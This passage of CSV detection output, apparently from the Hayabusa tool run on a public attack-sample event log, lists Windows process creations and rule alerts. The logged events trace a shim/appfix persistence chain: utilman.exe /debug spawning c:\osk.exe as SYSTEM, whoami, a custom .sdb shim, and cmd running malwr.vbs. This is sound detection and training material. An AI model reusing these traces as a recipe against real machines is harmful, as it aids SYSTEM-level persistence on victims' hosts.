+09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:31.860 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:35.745 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""c:\osk.exe"" : Path: C:\osk.exe : User: NT AUTHORITY\SYSTEM : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""c:\osk.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,low,Local Accounts 
Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,high,Whoami Execution Anomaly,,rules/sigma/process_creation/win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:00:01.518 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\wsqmcons.exe : Path: C:\Windows\System32\wsqmcons.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:00:01.539 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" : Path: C:\Windows\System32\schtasks.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\System32\wsqmcons.exe ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:10:34.489 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe $(Arg0) : Path: C:\Windows\System32\taskhost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:18:54.257 +09:00,PC01.example.corp,1,informational,Process Creation,Command: atbroker.exe : Path: C:\Windows\System32\AtBroker.exe : User: EXAMPLE\user01 : Parent Command: 
winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:18:57.202 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" : Path: C:\Windows\System32\mmc.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:21:05.306 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:22:28.886 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\rundll32.exe"" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb : Path: C:\Windows\System32\rundll32.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:22:33.593 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\Windows NT\Accessories\WORDPAD.EXE"" ""C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb"" : Path: C:\Program Files\Windows NT\Accessories\wordpad.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Windows\system32\rundll32.exe"" C:\Windows\system32\shell32.dll,OpenAs_RunDLL 
C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:26:05.397 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:26:08.852 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding : Path: C:\Windows\System32\slui.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:31:05.509 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:36:05.610 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:41:05.702 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: 
C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:41:11.440 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:41:17.339 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\cmd.EXE /c malwr.vbs : Path: C:\Windows\System32\cmd.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:41:17.339 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Logoff : Path: C:\Windows\System32\gpscript.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:41:18.290 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x1 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:41:18.410 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\servicing\TrustedInstaller.exe : Path: C:\Windows\servicing\TrustedInstaller.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:49.576 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 0000003c : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:49.856 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:50.157 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000001 0000003c : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:50.217 +09:00,PC01.example.corp,1,informational,Process Creation,Command: wininit.exe : Path: C:\Windows\System32\wininit.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c 
,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:50.217 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000001 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:50.387 +09:00,PC01.example.corp,1,informational,Process Creation,Command: winlogon.exe : Path: C:\Windows\System32\winlogon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000001 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:50.427 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\services.exe : Path: C:\Windows\System32\services.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:50.467 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\lsass.exe : Path: C:\Windows\System32\lsass.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:50.497 
+09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\lsm.exe : Path: C:\Windows\System32\lsm.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:51.308 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k DcomLaunch : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:51.599 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\VBoxService.exe : Path: C:\Windows\System32\VBoxService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:51.679 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:51.789 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:53.111 
+09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k GPSvcGroup : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:53.571 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\spoolsv.exe : Path: C:\Windows\System32\spoolsv.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:53.922 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:53.922 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.102 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Startup : Path: C:\Windows\System32\gpscript.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.182 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.182 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.593 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\freeSSHd\FreeSSHDService.exe"" : Path: C:\Program Files\freeSSHd\FreeSSHDService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.603 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.603 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.783 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""taskhost.exe"" : Path: C:\Windows\System32\taskhost.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.793 +09:00,PC01.example.corp,1,informational,Process Creation,Command: atbroker.exe : Path: C:\Windows\System32\AtBroker.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.813 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\slui.exe"" : Path: C:\Windows\System32\slui.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.224 +09:00,PC01.example.corp,1,informational,Process 
Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.224 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.404 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.404 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.514 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.514 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.544 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.544 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.594 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.594 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.654 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Logon : Path: C:\Windows\System32\gpscript.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.654 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\userinit.exe : Path: C:\Windows\System32\userinit.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.725 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\Explorer.EXE : Path: C:\Windows\explorer.exe : User: 
EXAMPLE\user01 : Parent Command: C:\Windows\system32\userinit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.805 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe $(Arg0) : Path: C:\Windows\System32\taskhost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.835 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.835 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.965 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\Sysmon.exe : Path: C:\Windows\Sysmon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:56.055 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe 